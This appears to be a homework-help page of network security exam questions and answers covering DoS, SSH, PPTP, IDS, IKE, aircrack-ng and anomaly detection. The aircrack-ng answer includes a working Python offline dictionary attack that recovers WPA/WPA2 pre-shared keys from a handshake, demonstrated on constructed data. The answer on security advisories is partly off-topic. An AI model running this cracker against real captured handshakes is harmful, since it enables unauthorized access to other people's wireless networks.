ID: 3849985 • Letter: 1
Question
1. (TCO A) What is a denial-of-service attack? How does a denial-of-service attack differ from a distributed denial-of-service attack? (Points : 25)
Question 2. (TCO A) What does SCORE have to do with network security? Discuss what role it has, if any. (Points : 25)
Question 3. (TCO B) A method to respond to security advisories should have at least these five elements. (Points : 25)
Question 4. (TCO B) What is the difference between a service pack and a hotfix? (Points : 25)
Question 5. (TCO C) What are the three core SSH capabilities? What does each do? (Points : 25)
Question 6. (TCO C) What are the limitations of PPTP? (Points : 25)
Question 7. (TCO D) What are the two types of IDS devices? (Points : 25)
Question 8. (TCO E) Name three of the benefits of IKE. (Points : 25)
Question 9. (TCO F) What is aircrack-ng used for and how does it work? (Points : 25)
Question 10. (TCO G) When considering vulnerability scanners, why is a program's capability to conduct an accurate scan crucial? (Points : 25)
Question 11. (TCO D) Discuss anomaly detection. (Points : 20)
Explanation / Answer
1. A denial-of-service (DoS) attack uses a single machine and a single Internet connection to flood a target with traffic (for example TCP SYN, UDP or ICMP packets) or with requests that are expensive to service. The goal is to exhaust the target's bandwidth, connection tables, CPU or memory so that it can no longer answer legitimate users, which takes down the website or whatever other service is hosted there.
A distributed denial-of-service (DDoS) attack has the same goal but a very different scale. Instead of one machine and one connection, the attacker uses many machines and many connections, typically compromised hosts spread around the world and controlled as a botnet. The key difference is that the target is overwhelmed by hundreds or thousands of sources at once rather than by a single attacker. That makes the traffic far larger and much harder to filter: blocking one source address stops a DoS attack, but a DDoS attack has no single address to block.
2. SCORE (Security Consensus Operational Readiness Evaluation) is a SANS community project, developed in cooperation with the Center for Internet Security, that produces consensus checklists and minimum-security recommendations for common platforms and network devices (firewalls, routers, operating systems, servers). Its role in network security is to give administrators an agreed baseline: the checklists are used as configuration standards when building systems and as audit guides when reviewing them. SCORE does not scan or score a network itself; it supplies the standard against which a network's configuration can be checked and helps administrators prioritize which gaps to close first.
3. 1) An effective framework. A framework must be adopted, adjusted and tailored to the organization's particular circumstances and to the kind of data being protected, which requires a deliberate effort by the organization. Executives need to establish governance that covers all of the organization's assets: its people, processes and technology. Choosing and implementing an appropriate framework is the essential first step in building a cybersecurity risk management program.
2) End-to-end scope. A cybersecurity program must be comprehensive to be effective, that is, it must cover every asset in the organization that needs protection. Many organizations find that simply locating all of their data is a challenge because of the ever-growing number of devices connected to the network. The program must also take a complete approach to identifying every cybersecurity concern, from third-party vendors to business processes. For advisories in particular this means an accurate inventory: you cannot tell whether an advisory affects you unless you know what software and versions you run.
3) Thorough risk assessment and threat modeling. Identifying the threats, the likelihood of each and the damage it could do is the essential step for prioritizing cybersecurity risks. In prioritizing, the security team should look at the organization's data from the outside, that is, identify which data is likely to be valuable from an attacker's perspective. This perspective lets the team build an effective strategy to prevent the most likely attacks, and it is what allows a given advisory to be rated as urgent or routine.
4) Proactive incident response planning. Accepting that any system's security may eventually be breached, many organizations have adopted incident response plans. Most of those plans simply gather dust and are out of date, while staff remain unprepared when the plans are really needed. Taking a proactive approach to incident response planning means testing the plan, identifying how to improve its effectiveness, making those improvements, and ensuring that staff are trained and ready to respond to a security breach and limit its damage.
5) Dedicated cybersecurity resources. The last, but not least, essential element is personnel who are dedicated to managing the organization's cybersecurity. To establish an effective cybersecurity risk management program, the roles and responsibilities for managing the chosen framework must be clearly defined.
4. Service pack: a cumulative collection of hotfixes and patches, tested together, which can also contain new features.
Patch/hotfix: an update addressing one specific issue (if there is a distinction between the two, it is that a hotfix is not as thoroughly tested as an update/patch and may not be publicly available). I don't know whether there is official terminology for update/patch/hotfix; I think the current official terms are LDR and GDR for the hotfix and the tested code respectively.
5. SSH's three core capabilities are:
1) Secure remote login (the secure shell itself). SSH replaces Telnet and rlogin with an encrypted, authenticated command-line session, so credentials and commands cannot be read or altered on the wire.
2) Secure file transfer. SCP and SFTP run over the same encrypted channel and replace FTP and rcp for copying files between hosts.
3) Port forwarding (tunnelling). SSH can carry arbitrary TCP connections inside the encrypted session, forwarding a local port to a remote service or the reverse, which lets insecure protocols such as X11, POP or VNC be protected without changing them.
All three rely on SSH authentication, which can use passwords or public keys. A caveat practitioners should keep in mind: SSH keys grant the same access as a username and password, frequently to privileged accounts on production servers, databases, routers, firewalls, disaster recovery systems and payment or patient-data systems, yet they are often created and installed without the oversight, controls and audits that passwords receive. Information security starts with controlling who is given access to systems and data; key provisioning and removal therefore need the same access controls as any other credential, or they become unmanaged back doors.
6. Some limitations are:
1) Weak security
PPTP is generally regarded as the least secure of the common VPN protocols. Its authentication (MS-CHAP v2) and its encryption (MPPE, based on RC4) have known weaknesses, and PPTP provides no data integrity or data origin authentication, so a recipient cannot be sure that data sent over the tunnel is authentic or has not been altered in transit. This considerably lowers its reliability, especially if the organization handles very sensitive information.
2) Lower performance on unstable connections
PPTP carries its data in GRE (IP protocol 47) alongside a TCP control channel, so it often has trouble with NAT devices and firewalls that do not pass GRE, and it performs poorly on lossy or unstable networks. It can be adequate for connecting remote workers and sharing documents, but it is not a good choice when a large amount of confidential data must be shared.
7. The two types are active and passive intrusion detection systems. An active IDS, also called an intrusion detection and prevention system (IDPS or IPS), is configured to automatically block suspected attacks without an administrator's intervention, for example by dropping packets or resetting connections. Its advantage is real-time corrective action in response to an attack; the trade-off is that a false positive blocks legitimate traffic.
A passive IDS only monitors and analyses network traffic and alerts an administrator to potential vulnerabilities and attacks; it cannot perform any protective or corrective action on its own. (IDS devices are also commonly divided by where they are deployed: network-based (NIDS), which watch traffic on a segment, and host-based (HIDS), which watch a single system's logs and files.)
8. Benefits of IKE, as Cisco lists them for IPsec, include: it eliminates the need to manually configure all IPsec security parameters on both peers; it lets you specify a lifetime for IPsec security associations and change encryption keys during a session; it allows IPsec to provide anti-replay services; and it permits certificate authority (CA) support and dynamic authentication of peers. (Pre-shared keys, RSA-encrypted nonces and RSA signatures are the three methods IKE can use to authenticate peers; they are how IKE authenticates, not benefits in themselves.)
9. Aircrack-ng is a suite of tools for auditing 802.11 wireless LANs: a detector and packet sniffer (airodump-ng), a frame injection and replay tool (aireplay-ng), and a WEP and WPA/WPA2-PSK key cracker and analysis tool (aircrack-ng). It works with any wireless network interface controller whose driver supports raw monitor mode, so it can capture 802.11a, 802.11b and 802.11g traffic without associating to a network. For WEP, it collects a large number of encrypted frames and exploits statistical weaknesses in RC4's use of initialization vectors (the FMS/KoreK and PTW attacks) to recover the key. For WPA/WPA2-PSK it cannot attack the encryption directly: it captures the four-way handshake between a client and the access point (optionally forcing a client to reconnect with a deauthentication frame) and then runs an offline dictionary attack, deriving the key from each candidate passphrase and checking it against the message integrity code in the captured handshake.
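The following Python is an added example written for this page; it is not part of the original answer and not code from the aircrack-ng project. It reproduces the WPA/WPA2-PSK step described above: PBKDF2 turns a candidate passphrase and the SSID into the PMK, the PRF expands it into the PTK, the first 16 bytes (the KCK) sign the EAPOL-Key message, and a candidate whose MIC matches the captured one is the network's pre-shared key. The SSID, MAC addresses, nonces, EAPOL bytes and wordlist are constructed stand-ins, and the "captured" MIC is produced from the known passphrase so the example runs offline.

```python
import hashlib
import hmac
from typing import Optional


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) per IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).

    PRF-512 concatenates HMAC-SHA1(PMK, label || 0x00 || data || i) for i = 0..3.
    The first 16 bytes of the PTK are the KCK, the key that signs the handshake MIC.
    """
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    ]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for WPA2/CCMP: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), truncated
    to 16 bytes. (WPA/TKIP uses HMAC-MD5 instead; this example covers the WPA2 case only.)"""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(handshake: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack, the way aircrack-ng attacks WPA/WPA2-PSK: for every candidate
    passphrase derive PMK -> PTK -> KCK and recompute the MIC of the captured EAPOL-Key message.
    The candidate whose MIC matches the captured one is the PSK; None means no hit in the list."""
    for candidate in wordlist:
        pmk = wpa_pmk(candidate, handshake["ssid"])
        kck = wpa_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                      handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def constructed_handshake(passphrase: str = "correct horse battery staple") -> dict:
    """Constructed stand-in for a captured four-way handshake (not a real capture): the real
    client and AP derive the same KCK from the real PSK and sign message 2 with it, so we do
    exactly that here to produce the 'captured' MIC."""
    ssid = "ExampleNet"                              # hypothetical network name
    ap_mac = bytes.fromhex("00115a000001")           # hypothetical BSSID
    sta_mac = bytes.fromhex("001122334455")          # hypothetical client MAC
    anonce = hashlib.sha256(b"anonce").digest()      # stand-ins for the two 32-byte random nonces
    snonce = hashlib.sha256(b"snonce").digest()
    # Minimal stand-in for EAPOL-Key message 2 (version, type, length, body) with MIC field zeroed
    eapol = bytes([0x02, 0x03, 0x00, 0x5F]) + bytes(95)
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


if __name__ == "__main__":
    hs = constructed_handshake()
    wordlist = ["password", "letmein", "correct horse battery staple", "qwerty"]
    print("recovered PSK:", crack_psk(hs, wordlist))
```

The cost of the attack is entirely in the 4096-iteration PBKDF2 per candidate, which is why aircrack-ng's speed is measured in keys per second and why a long, non-dictionary passphrase defeats it: nothing in the handshake leaks the key, so the only path is guessing.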
10. A scanner is only useful if its results can be trusted. False positives (reporting a vulnerability that is not actually present, for example because a banner version was misread or a backported fix was not recognized) waste staff time and erode confidence in the tool until real findings are ignored. False negatives (missing a vulnerability that is present) are worse, because the organization believes it is safe while it remains exposed. Accuracy also depends on the scanner's checks being current: new vulnerabilities and technologies are published every day, so the scanner needs an automatic update mechanism for its plugins and signatures.
11. Anomaly detection is the identification of items, events or observations that do not conform to an expected pattern or to the other items in a dataset. Typically the anomalous items indicate a problem of some kind, for example bank fraud, a structural defect, a medical condition or errors in a text. In the specific context of misuse and network intrusion detection, the interesting objects are often not rare objects but unexpected bursts in activity: an anomaly-based IDS builds a baseline of normal behaviour (traffic volume, protocols, ports, login times) and alerts when current activity deviates significantly from it. Its strength is that it can catch previously unseen attacks for which no signature exists; its weakness is a higher false-positive rate, since any legitimate change in behaviour also looks anomalous, and the baseline itself must be learned during a period that is known to be clean.
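As an added example illustrating the burst-based anomaly detection described above, and the single-source versus distributed distinction from Question 1, the following Python was written for this page (it is not part of the original answer). It learns a baseline from known-good time windows of a constructed connection log, flags windows whose volume is statistically abnormal, and labels each burst as the DoS pattern (one dominant source) or the DDoS pattern (load spread across many sources). The log lines, addresses and thresholds are constructed for the demonstration.

```python
from collections import Counter, defaultdict
from statistics import mean, pstdev


def sample_log():
    """Constructed connection log, one 'epoch_second src_ip dst_port' record per line (not real data).
    Windows 0-9: normal traffic from a rotating set of ~20 clients (4 to 7 connections each).
    Window 10:   a burst of 200 connections from a single source (single-attacker DoS).
    Window 11:   a burst of the same size spread across 200 sources (DDoS / botnet pattern).
    Window 12:   a small uptick from one client that should not be flagged."""
    lines = []
    for w in range(10):
        for j in range(4 + w % 4):
            lines.append(f"{10 * w + j} 192.0.2.{(7 * w + j) % 20 + 1} 80")
    for j in range(200):
        lines.append(f"{100 + j % 10} 203.0.113.7 80")
    for j in range(200):
        lines.append(f"{110 + j % 10} 198.51.100.{j + 1} 80")
    for j in range(8):
        lines.append(f"{120 + j} 203.0.113.7 80")
    return lines


def bucket(lines, window_seconds=10):
    """Group records into fixed time windows: window index -> Counter of connections per source IP."""
    windows = defaultdict(Counter)
    for line in lines:
        ts, src, _port = line.split()
        windows[int(ts) // window_seconds][src] += 1
    return windows


def detect_bursts(windows, baseline_windows, z_threshold=3.0, min_count=20, single_source_share=0.9):
    """Volume-based anomaly detection.

    The baseline is the mean and standard deviation of per-window totals over known-good windows.
    A window whose total lies z_threshold standard deviations above the mean, and above an absolute
    floor (so a very quiet baseline does not make tiny changes 'anomalous'), is reported. Each alert
    also records how many sources produced the burst: one source carrying most of the traffic is the
    DoS pattern, many sources sharing it is the DDoS pattern."""
    totals = [sum(windows[w].values()) for w in baseline_windows]
    mu, sigma = mean(totals), pstdev(totals)
    alerts = []
    for w in sorted(windows):
        total = sum(windows[w].values())
        if sigma:
            z = (total - mu) / sigma
        else:  # constant baseline: any increase is infinitely unlikely under the model
            z = float("inf") if total > mu else 0.0
        if total < min_count or z < z_threshold:
            continue
        top_src, top_count = windows[w].most_common(1)[0]
        kind = "DoS (single source)" if top_count / total >= single_source_share else "DDoS (distributed)"
        alerts.append({"window": w, "total": total, "z": round(z, 1),
                       "sources": len(windows[w]), "top_source": top_src, "kind": kind})
    return alerts


def run_demo():
    """Run the detector over the constructed log; the first ten windows are the clean baseline."""
    return detect_bursts(bucket(sample_log()), baseline_windows=range(10))


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The DoS alert carries a single top source that a firewall rule can block outright; the DDoS alert has no such address, which is the practical reason the distinction matters for response. The baseline windows are passed in explicitly because the detector must not learn "normal" from traffic that may already contain the attack.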